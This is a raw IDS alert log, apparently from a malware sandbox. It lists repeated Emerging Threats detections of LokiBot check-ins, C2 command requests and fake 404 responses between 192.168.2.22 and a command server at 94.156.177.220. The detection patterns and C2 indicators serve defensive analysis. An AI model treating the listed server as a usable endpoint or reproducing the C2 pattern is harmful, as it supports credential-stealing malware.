                                                                                    2024-10-24T08:46:14.530065+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.22080TCP
                                                                                    2024-10-24T08:46:15.610265+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.22080TCP
                                                                                    2024-10-24T08:46:15.610265+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.22080TCP
                                                                                    2024-10-24T08:46:15.615823+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249184TCP
                                                                                    2024-10-24T08:46:15.797609+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.22080TCP
                                                                                    2024-10-24T08:46:15.797609+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.22080TCP
                                                                                    2024-10-24T08:46:15.797609+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.22080TCP
                                                                                    2024-10-24T08:46:17.050811+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.22080TCP
                                                                                    2024-10-24T08:46:17.050811+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.22080TCP
                                                                                    2024-10-24T08:46:17.050862+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249185TCP
                                                                                    2024-10-24T08:46:17.256132+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.22080TCP
                                                                                    2024-10-24T08:46:17.256132+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.22080TCP
                                                                                    2024-10-24T08:46:17.256132+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.22080TCP
                                                                                    2024-10-24T08:46:18.216510+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.22080TCP
                                                                                    2024-10-24T08:46:18.216510+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.22080TCP
                                                                                    2024-10-24T08:46:18.222022+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249186TCP
                                                                                    2024-10-24T08:46:18.375546+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.22080TCP
                                                                                    2024-10-24T08:46:18.375546+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.22080TCP
                                                                                    2024-10-24T08:46:18.375546+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.22080TCP
                                                                                    2024-10-24T08:46:19.333801+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.22080TCP
                                                                                    2024-10-24T08:46:19.333801+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.22080TCP
                                                                                    2024-10-24T08:46:19.339622+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249188TCP
                                                                                    2024-10-24T08:46:19.648513+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.22080TCP
                                                                                    2024-10-24T08:46:19.648513+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.22080TCP
                                                                                    2024-10-24T08:46:19.648513+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.22080TCP
                                                                                    2024-10-24T08:46:20.604827+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.22080TCP
                                                                                    2024-10-24T08:46:20.604827+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.22080TCP
                                                                                    2024-10-24T08:46:20.611001+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249189TCP
                                                                                    2024-10-24T08:46:20.762214+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.22080TCP
                                                                                    2024-10-24T08:46:20.762214+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.22080TCP
                                                                                    2024-10-24T08:46:20.762214+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.22080TCP
                                                                                    2024-10-24T08:46:21.710093+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.22080TCP
                                                                                    2024-10-24T08:46:21.710093+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.22080TCP
                                                                                    2024-10-24T08:46:21.715929+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249190TCP
                                                                                    2024-10-24T08:46:21.849543+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.22080TCP
                                                                                    2024-10-24T08:46:21.849543+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.22080TCP
                                                                                    2024-10-24T08:46:21.849543+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.22080TCP
                                                                                    2024-10-24T08:46:22.808952+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.22080TCP
                                                                                    2024-10-24T08:46:22.808952+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.22080TCP
                                                                                    2024-10-24T08:46:22.814634+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249191TCP
                                                                                    2024-10-24T08:46:23.281189+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.22080TCP
                                                                                    2024-10-24T08:46:23.281189+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.22080TCP
                                                                                    2024-10-24T08:46:23.281189+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.22080TCP
                                                                                    2024-10-24T08:46:24.246938+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.22080TCP
                                                                                    2024-10-24T08:46:24.246938+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.22080TCP
                                                                                    2024-10-24T08:46:24.252638+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249192TCP
                                                                                    2024-10-24T08:46:24.390800+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.22080TCP
                                                                                    2024-10-24T08:46:24.390800+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.22080TCP
                                                                                    2024-10-24T08:46:24.390800+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.22080TCP
                                                                                    2024-10-24T08:46:25.331525+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.22080TCP
                                                                                    2024-10-24T08:46:25.331525+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.22080TCP
                                                                                    2024-10-24T08:46:25.337740+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249193TCP
                                                                                    2024-10-24T08:46:25.483247+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.22080TCP
                                                                                    2024-10-24T08:46:25.483247+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.22080TCP
                                                                                    2024-10-24T08:46:25.483247+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.22080TCP
                                                                                    2024-10-24T08:46:26.551291+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.22080TCP
                                                                                    2024-10-24T08:46:26.551291+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.22080TCP
                                                                                    2024-10-24T08:46:26.557171+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249194TCP
                                                                                    2024-10-24T08:46:26.725660+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.22080TCP
                                                                                    2024-10-24T08:46:26.725660+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.22080TCP
                                                                                    2024-10-24T08:46:26.725660+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.22080TCP
                                                                                    2024-10-24T08:46:28.251730+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.22080TCP
                                                                                    2024-10-24T08:46:28.251730+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.22080TCP
                                                                                    2024-10-24T08:46:28.252264+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249195TCP
                                                                                    2024-10-24T08:46:28.399061+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.22080TCP
                                                                                    2024-10-24T08:46:28.399061+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.22080TCP
                                                                                    2024-10-24T08:46:28.399061+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.22080TCP
                                                                                    2024-10-24T08:46:29.338163+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.22080TCP
                                                                                    2024-10-24T08:46:29.338163+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.22080TCP
                                                                                    2024-10-24T08:46:29.343879+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249196TCP
                                                                                    2024-10-24T08:46:29.683232+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.22080TCP
                                                                                    2024-10-24T08:46:29.683232+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.22080TCP
                                                                                    2024-10-24T08:46:29.683232+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.22080TCP
                                                                                    2024-10-24T08:46:30.655966+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.22080TCP
                                                                                    2024-10-24T08:46:30.655966+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.22080TCP
                                                                                    2024-10-24T08:46:30.661678+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249197TCP
                                                                                    2024-10-24T08:46:30.898100+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.22080TCP
                                                                                    2024-10-24T08:46:30.898100+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.22080TCP
                                                                                    2024-10-24T08:46:30.898100+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.22080TCP
                                                                                    2024-10-24T08:46:31.856886+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.22080TCP
                                                                                    2024-10-24T08:46:31.856886+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.22080TCP
                                                                                    2024-10-24T08:46:31.862466+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249198TCP
                                                                                    2024-10-24T08:46:32.194843+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.22080TCP
                                                                                    2024-10-24T08:46:32.194843+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.22080TCP
                                                                                    2024-10-24T08:46:32.194843+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.22080TCP
                                                                                    2024-10-24T08:46:33.155234+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.22080TCP
                                                                                    2024-10-24T08:46:33.155234+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.22080TCP
                                                                                    2024-10-24T08:46:33.161034+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249199TCP
                                                                                    2024-10-24T08:46:33.628718+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.22080TCP
                                                                                    2024-10-24T08:46:33.628718+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.22080TCP
                                                                                    2024-10-24T08:46:33.628718+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.22080TCP
                                                                                    2024-10-24T08:46:34.578342+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.22080TCP
                                                                                    2024-10-24T08:46:34.578342+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.22080TCP
                                                                                    2024-10-24T08:46:34.584074+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249200TCP
                                                                                    2024-10-24T08:46:34.733384+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.22080TCP
                                                                                    2024-10-24T08:46:34.733384+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.22080TCP
                                                                                    2024-10-24T08:46:34.733384+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.22080TCP
                                                                                    2024-10-24T08:46:35.676631+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.22080TCP
                                                                                    2024-10-24T08:46:35.676631+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.22080TCP
                                                                                    2024-10-24T08:46:35.682118+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249201TCP
                                                                                    2024-10-24T08:46:35.832085+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.22080TCP
                                                                                    2024-10-24T08:46:35.832085+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.22080TCP
                                                                                    2024-10-24T08:46:35.832085+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.22080TCP
                                                                                    2024-10-24T08:46:36.783619+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.22080TCP
                                                                                    2024-10-24T08:46:36.783619+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.22080TCP
                                                                                    2024-10-24T08:46:36.789327+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249202TCP
                                                                                    2024-10-24T08:46:37.014681+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.22080TCP
                                                                                    2024-10-24T08:46:37.014681+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.22080TCP
                                                                                    2024-10-24T08:46:37.014681+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.22080TCP
                                                                                    2024-10-24T08:46:37.966886+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.22080TCP
                                                                                    2024-10-24T08:46:37.966886+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.22080TCP
                                                                                    2024-10-24T08:46:37.972584+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249203TCP
                                                                                    2024-10-24T08:46:38.149338+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.22080TCP
                                                                                    2024-10-24T08:46:38.149338+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.22080TCP
                                                                                    2024-10-24T08:46:38.149338+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.22080TCP
                                                                                    2024-10-24T08:46:39.114628+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.22080TCP
                                                                                    2024-10-24T08:46:39.114628+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.22080TCP
                                                                                    2024-10-24T08:46:39.120439+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249204TCP
                                                                                    2024-10-24T08:46:39.259709+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.22080TCP
                                                                                    2024-10-24T08:46:39.259709+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.22080TCP
                                                                                    2024-10-24T08:46:39.259709+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.22080TCP
                                                                                    2024-10-24T08:46:40.223656+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.22080TCP
                                                                                    2024-10-24T08:46:40.223656+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.22080TCP
                                                                                    2024-10-24T08:46:40.229358+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249205TCP
                                                                                    2024-10-24T08:46:40.378743+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.22080TCP
                                                                                    2024-10-24T08:46:40.378743+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.22080TCP
                                                                                    2024-10-24T08:46:40.378743+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.22080TCP
                                                                                    2024-10-24T08:46:41.328860+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.22080TCP
                                                                                    2024-10-24T08:46:41.328860+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.22080TCP
                                                                                    2024-10-24T08:46:41.334498+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249206TCP
                                                                                    2024-10-24T08:46:41.479514+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.22080TCP
                                                                                    2024-10-24T08:46:41.479514+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.22080TCP
                                                                                    2024-10-24T08:46:41.479514+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.22080TCP
                                                                                    2024-10-24T08:46:42.424772+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.22080TCP
                                                                                    2024-10-24T08:46:42.424772+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.22080TCP
                                                                                    2024-10-24T08:46:42.430538+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249207TCP
                                                                                    2024-10-24T08:46:42.564513+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.22080TCP
                                                                                    2024-10-24T08:46:42.564513+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.22080TCP
                                                                                    2024-10-24T08:46:42.564513+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.22080TCP
                                                                                    2024-10-24T08:46:43.523331+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.22080TCP
                                                                                    2024-10-24T08:46:43.523331+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.22080TCP
                                                                                    2024-10-24T08:46:43.529969+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249208TCP
                                                                                    2024-10-24T08:46:43.679806+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.22080TCP
                                                                                    2024-10-24T08:46:43.679806+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.22080TCP
                                                                                    2024-10-24T08:46:43.679806+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.22080TCP
                                                                                    2024-10-24T08:46:44.664054+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.22080TCP
                                                                                    2024-10-24T08:46:44.664054+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.22080TCP
                                                                                    2024-10-24T08:46:44.670152+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249209TCP
                                                                                    2024-10-24T08:46:45.035157+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.22080TCP
                                                                                    2024-10-24T08:46:45.035157+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.22080TCP
                                                                                    2024-10-24T08:46:45.035157+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.22080TCP
                                                                                    2024-10-24T08:46:45.984133+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.22080TCP
                                                                                    2024-10-24T08:46:45.984133+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.22080TCP
                                                                                    2024-10-24T08:46:45.990113+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249210TCP
                                                                                    2024-10-24T08:46:46.148100+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.22080TCP
                                                                                    2024-10-24T08:46:46.148100+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.22080TCP
                                                                                    2024-10-24T08:46:46.148100+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.22080TCP
                                                                                    2024-10-24T08:46:47.107551+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.22080TCP
                                                                                    2024-10-24T08:46:47.107551+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.22080TCP
                                                                                    2024-10-24T08:46:47.113297+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249211TCP
                                                                                    2024-10-24T08:46:47.878298+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.22080TCP
                                                                                    2024-10-24T08:46:47.878298+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.22080TCP
                                                                                    2024-10-24T08:46:47.878298+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.22080TCP
                                                                                    2024-10-24T08:46:48.810873+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.22080TCP
                                                                                    2024-10-24T08:46:48.810873+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.22080TCP
                                                                                    2024-10-24T08:46:48.816601+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249212TCP
                                                                                    2024-10-24T08:46:49.169376+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.22080TCP
                                                                                    2024-10-24T08:46:49.169376+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.22080TCP
                                                                                    2024-10-24T08:46:49.169376+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.22080TCP
                                                                                    2024-10-24T08:46:50.129192+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.22080TCP
                                                                                    2024-10-24T08:46:50.129192+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.22080TCP
                                                                                    2024-10-24T08:46:50.135743+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249213TCP
                                                                                    2024-10-24T08:46:50.273713+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.22080TCP
                                                                                    2024-10-24T08:46:50.273713+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.22080TCP
                                                                                    2024-10-24T08:46:50.273713+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.22080TCP
                                                                                    2024-10-24T08:46:51.214727+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.22080TCP
                                                                                    2024-10-24T08:46:51.214727+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.22080TCP
                                                                                    2024-10-24T08:46:51.220336+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249214TCP
                                                                                    2024-10-24T08:46:51.369260+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.22080TCP
                                                                                    2024-10-24T08:46:51.369260+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.22080TCP
                                                                                    2024-10-24T08:46:51.369260+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.22080TCP
                                                                                    2024-10-24T08:46:52.324683+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.22080TCP
                                                                                    2024-10-24T08:46:52.324683+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.22080TCP
                                                                                    2024-10-24T08:46:52.330270+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249215TCP
                                                                                    2024-10-24T08:46:52.485586+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.22080TCP
                                                                                    2024-10-24T08:46:52.485586+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.22080TCP
                                                                                    2024-10-24T08:46:52.485586+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.22080TCP
                                                                                    2024-10-24T08:46:53.452603+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.22080TCP
                                                                                    2024-10-24T08:46:53.452603+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.22080TCP
                                                                                    2024-10-24T08:46:53.458287+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249216TCP
                                                                                    2024-10-24T08:46:53.624164+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.22080TCP
                                                                                    2024-10-24T08:46:53.624164+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.22080TCP
                                                                                    2024-10-24T08:46:53.624164+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.22080TCP
                                                                                    2024-10-24T08:46:54.556519+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.22080TCP
                                                                                    2024-10-24T08:46:54.556519+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.22080TCP
                                                                                    2024-10-24T08:46:54.562435+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249217TCP
                                                                                    2024-10-24T08:46:54.754980+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.22080TCP
                                                                                    2024-10-24T08:46:54.754980+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.22080TCP
                                                                                    2024-10-24T08:46:54.754980+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.22080TCP
                                                                                    2024-10-24T08:46:55.732586+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.22080TCP
                                                                                    2024-10-24T08:46:55.732586+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.22080TCP
                                                                                    2024-10-24T08:46:55.739134+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249218TCP
                                                                                    2024-10-24T08:46:55.935933+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921994.156.177.22080TCP
                                                                                    2024-10-24T08:46:55.935933+02002025381ET MALWARE LokiBot Checkin1192.168.2.224921994.156.177.22080TCP
                                                                                    2024-10-24T08:46:55.935933+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921994.156.177.22080TCP
                                                                                    2024-10-24T08:46:56.915668+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921994.156.177.22080TCP
                                                                                    2024-10-24T08:46:56.915668+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921994.156.177.22080TCP
                                                                                    2024-10-24T08:46:56.921372+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249219TCP
                                                                                    2024-10-24T08:46:57.102699+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.22080TCP
                                                                                    2024-10-24T08:46:57.102699+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.22080TCP
                                                                                    2024-10-24T08:46:57.102699+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.22080TCP
                                                                                    2024-10-24T08:46:58.072935+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.22080TCP
                                                                                    2024-10-24T08:46:58.072935+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.22080TCP
                                                                                    2024-10-24T08:46:58.078596+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249220TCP
                                                                                    2024-10-24T08:46:58.242857+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922194.156.177.22080TCP
                                                                                    2024-10-24T08:46:58.242857+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922194.156.177.22080TCP
